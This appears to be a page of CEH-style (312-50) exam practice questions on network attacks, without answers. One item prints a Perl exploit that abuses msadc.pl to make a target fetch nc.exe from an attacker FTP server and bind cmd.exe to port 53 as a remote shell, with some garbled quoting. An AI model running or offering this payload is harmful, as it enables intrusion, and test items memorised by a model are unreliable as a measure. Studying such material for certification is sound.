PrepAway - Latest Free Exam Questions & Answers

Tag: 312-50

How much information will Clive be able to get from the client before commencing his test?

Clive has been hired to perform a Black-Box test by one of his clients. How much information will Clive be able to get from the client before commencing his test?

What is the name of this library?

Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of platforms. In order to use this tool on the Windows platform you must install a packet capture library. What is the name of this library?

What is the destination MAC address of a broadcast frame?

John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?

What is the expected result of the following exploit?

What is the expected result of the following exploit?
################################################################# $port = 53;# Spawn cmd.exe on port X
$your = “192.168.1.1”;# Your FTP Server
$user = “Anonymous”;# login as
$pass = ‘noone@nowhere.com’;# password
################################################################# $host = $ARGV[0];
print “Starting …n”;
print “Server will download the file nc.exe from $your FTP server.n”;
system(“perl msadc.pl -h $host -C “echo open $your >sasfile””);
system(“perl msadc.pl -h $host -C “echo $user>>sasfile””);
system(“perl msadc.pl -h $host -C “echo $pass>>sasfile””);
system(“perl msadc.pl -h $host -C “echo bin>>sasfile””);
system(“perl msadc.pl -h $host -C “echo get nc.exe>>sasfile””);
system(“perl msadc.pl -h $host -C “echo get hacked.html>>sasfile””);
system(“perl msadc.pl -h $host -C “echo quit>>sasfile””);
print “Server is downloading …n”;
system(“perl msadc.pl -h $host -C “ftp -s:sasfile””);
print “Press ENTER when download is finished … (That’s why it’s good to have your own ftp server)n”;
$o=; print “Opening …n”;
system(“perl msadc.pl -h $host -C “nc -l -p $port -e cmd.exe””);
print “Done.n”;
#system(“telnet $host $port”); exit(0);

From the information given, what type of attack is Bryce attempting to perform?

Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The total size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given, what type of attack is Bryce attempting to perform?

What is this attack most appropriately called?

Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called?

Which of the following statements is true?

In an attempt to secure his 802.11b wireless network, Bob decides to use strategic antenna positioning. He places the antennas for the access points near the center of the building. For those access points near the outer edge of the building he uses semi-directional antennas that face towards the buildings center. There is a large parking lot and outlying field surrounding the building that extends out half a mile around the building. Bob figures that with this and his placement of antennas, his wireless network will be safe from attack. Which of the following statements is true?

ARP poisoning is achieved in _____ steps

ARP poisoning is achieved in _____ steps


Page 47 of 150« First...102030...4546474849...607080...Last »